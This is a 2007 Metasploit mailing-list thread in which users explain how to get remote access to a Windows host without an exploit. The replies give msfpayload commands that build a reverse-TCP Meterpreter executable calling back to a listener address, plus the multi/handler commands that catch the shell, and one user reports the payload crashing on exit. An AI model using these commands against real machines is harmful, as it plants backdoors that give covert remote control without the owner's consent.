Metasploit mailing list archives

query about meterpreter


From: owen.crow at gmail.com (Owen Crow)
Date: Fri, 4 May 2007 14:37:27 -0500

The 3.0 instructions worked for me great although I used msfcli for the handler:

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LPORT=4444 LHOST=1.2.3.4 e

Unfortunately, the x.exe crashes whenever I quit meterpreter.  I tried
the different EXITFUNC values to see if that mattered, but they all
crash with "x.exe has encountered a problem and needs to close.".

Is this normal behavior for the payload?

Thanks,
Owen

On 5/4/07, Hamid . K <elite_netbios at yahoo.com> wrote:

Hi ,
This question is answered multiple times before this .
feel free to browse mailing-list archive.
here's my quick way :

in 2.x :
=====
msfpayload win32_reverse_meterpreter LHOST=83.170.59.15 LPORT=443
EXITFUNC=thread X >rev2.exe
msfcli payload_handler PAYLOAD=win32_reverse_meterpreter
LHOST=1.2.3.4 LPORT=21 E

in 3.x
====
msfpayload windows/meterpreter/reverse_tcp LPORT=21 LHOST=1.2.3.4
EXITFUNC=thread X >x.exe

As we no more have msfcli in 3.x , you should use HANDLER  module , with
proper payload set :
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp


hamid.




----- Original Message ----
From: Ramakrishna Nyayapathi <nramkey at gmail.com>
To: framework at metasploit.com
Sent: Friday, May 4, 2007 4:05:01 PM
Subject: [framework] query about meterpreter

Hi all,
Many congrats to the metasploit team for writing such a wonderful tool.
I was wondering if it would be possible to obtain access to a remote host
through meterpreter-say a windows box running netcat or telnet server
without using any exploit?

 ________________________________
We won't tell. Get more on shows you hate to love
(and love to hate): Yahoo! TV's Guilty Pleasures list.



Current thread: